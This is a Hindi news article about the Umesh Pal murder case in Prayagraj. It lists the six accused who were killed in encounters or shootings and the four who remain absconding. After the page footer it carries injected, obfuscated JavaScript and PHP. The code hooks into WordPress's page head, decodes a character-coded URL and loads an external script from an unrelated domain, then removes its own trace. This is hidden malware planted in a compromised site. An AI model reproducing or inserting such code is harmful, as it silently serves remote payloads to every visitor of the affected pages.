Saturday, July 13, 2024
Google search engine
Homeअपराधउमेश पाल हत्याकांड में मारे गये 6 आरोपी तीन अब भी फरार

उमेश पाल हत्याकांड में मारे गये 6 आरोपी तीन अब भी फरार

लखनऊ: 24 फरवरी को प्रयागराज की सड़कों पर दिनदहाड़े उमेश पाल की हत्या कर दी गई थी. इस हत्याकांड का सीसीटीवी फुटेज देखकर हर कोई सहम गया था. फुटेज में देखा जा सकता था कि चारों ओर से शूटरों ने किस तरह से उमेश पाल और उनके दो गनर्स पर ताबड़तोड़ गोलियां बरसाई थीं, इस दौरान बम भी फेंके गए थे. इस हत्याकांड के 50 दिन बाद प्रयागराज में फिर शूटआउट देखा गया. तीन शूटरों ने 18 सेकेंड में 18 गोलियां दाग कर माफिया अतीक और उसके भाई अशरफ को छलनी कर दिया. अतीक और अशरफ न सिर्फ राजू पाल मर्डर केस में मुख्य आरोपी थे, बल्कि उमेश पाल हत्याकांड में भी दोनों पर जेल से साजिश रचने का आरोप है.

उमेश पाल हत्याकांड: मारे गए 6 आरोपी
उमेश पाल की पत्नी की शिकायत पर अतीक, भाई अशरफ, पत्नी शाइस्ता, बेटे असद, शूटर अरमान, गुलाम, गुड्डू मुस्लिम और साबिर समेत 9 लोगों पर मामला दर्ज किया गया था. उमेश पाल हत्याकांड में शामिल 6 आरोपी मारे जा चुके हैं. जबकि अतीक की पत्नी शाइस्ता के अलावा 3 अन्य फरार हैं.

उमेश पाल मर्डर केस के 6 आरोपियों की मौत

हत्याकांड में शामिल इन 6 आरोपियों की हुई मौत
27 फरवरी अरबाज ढेर: पुलिस ने 27 फरवरी को अतीक अहमद के करीबी अरबाज को ढेर कर दिया था. उमेश पाल की हत्या में शूटरों ने जिस क्रेटा कार का इस्तेमाल किया गया था, उसे अरबाज ही चला रहा था. अरबाज, अतीक अहमद की गाड़ी भी चलाता था. हत्या में जिस क्रेटा कार का इस्तेमाल किया गया था, वह भी अरबाज के घर के बाहर मिली थी.

6 मार्च विजय चौधरी का एनकाउंटर: प्रयागराज के लालापुर इलाके का रहने वाला विजय चौधरी बाहुबली डॉन अतीक अहमद का कुख्यात शार्प शूटर था. उसने ही उमेश पर सबसे पहले फायरिंग की थी. विजय चौधरी को यूपी पुलिस ने 6 मार्च को प्रयागराज के कौंधियारा में एनकाउंटर में मार गिराया था. विजय चौधरी का नाम शुरुआती एफआईआर में नहीं था.

13 अप्रैल असद और गुलाम का एनकाउंटर: अतीक के बेटे असद और गुलाम को 13 अप्रैल को झांसी में एनकाउंटर में मार गिराया गया था. दोनों पर उमेश पाल पर फायरिंग का आरोप था. उमेश पाल की हत्या का जो सीसीटीवी फुटेज सामने आया था, उसमें भी दोनों फायरिंग करते नजर आए थे.

15 अप्रैल अतीक और अशरफ की हत्या: माफिया अतीक अहमद और उसके भाई अशरफ की शनिवार रात प्रयागराज में गोलियों से भूनकर हत्या कर दी गई. पुलिस घेरे में इस दोहरे हत्याकांड को अरुण मौर्या, सनी और लवलेश तिवारी ने अंजाम दिया. तीनों पत्रकार बनकर पुलिस के काफिले के नजदीक पहुंचे और जैसे ही अतीक और उसके भाई अशरफ ने मीडिया से बात करना शुरू की, तीनों ने ताबड़तोड़ फायरिंग कर दी. इस दौरान करीब 18 राउंड गोलियां चलीं, जिनमें से 8 गोली अतीक अहमद को लगीं.

अतीक की पत्नी समेत चार फरार
उमेश पाल मर्डर केस में अभी अतीक की पत्नी शाइस्ता के अलावा तीन शूटर अरमान, गुड्डू मुस्लिम और साबिर फरार हैं.

किस पर क्या क्या आरोप?
शाइस्ता परवीन: उमेश पाल की हत्या के मामले में अतीक अहमद के साथ-साथ उसकी पत्नी शाइस्ता परवीन भी अब पुलिस के निशाने पर है. पुलिस ने शाइस्ता पर इनाम भी घोषित किया है. पुलिस का आरोप है कि वो शाइस्ता परवीन ही है, जिसने ना सिर्फ एक-एक शूटर से बात की, उन्हें रुपये पैसे दिए, बल्कि वारदात को अंजाम देने के बाद कैसे भागना है, कैसे छुपना है, ये सब भी बताया और तो और पुलिस से बचने के लिए उसने ही अपने बेटे असद से शूटरों के लिए 16 मोबाइल फोन और 16 सिम कार्ड खरीदवाए और इन्हें शूटरों तक पहुंचाया था.

बमबाज गुड्डू मुस्लिम : उमेश हत्याकांड से जुड़े एक सीसीटीवी फुटेज में गुड्डू मुस्लिम बम फेंकते कैद हुआ था. अतीक से पहले उत्तर प्रदेश के दूसरे माफिया गुडों के साथ रह चुके गुड्डू की खासियत है कि वह गोली नहीं, बम मारकर ही हत्या की वारदातों को अंजाम देता है. उत्तर प्रदेश के माफिया डॉन धनंजय सिंह, अभय सिंह से लेकर मुख्तार अंसारी तक के लिए गुड्डू मुस्लिम ने काम किया है. बीते 10 साल से वह अतीक अहमद की गैंग में शामिल है. प्रयागराज में अतीक अहमद के लिए रेलवे के स्क्रैप और प्रॉपर्टी डीलिंग का काम कुख्यात गुड्डू मुस्लिम ही संभालता रहा था. गुड्डू मुस्लिम अभी फरार है, यूपी पुलिस की कई टीमें उसकी तलाश में जुटी हैं.

साबिर और अरमान: उमेश पाल हत्याकांड में शूटर साबिर और अरमान का नाम भी शामिल है. दोनों फरार हैं. पुलिस ने इनपर 5-5 लाख का इनाम घोषित किया है. दोनों अतीक गैंग के शूटर हैं.

 

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>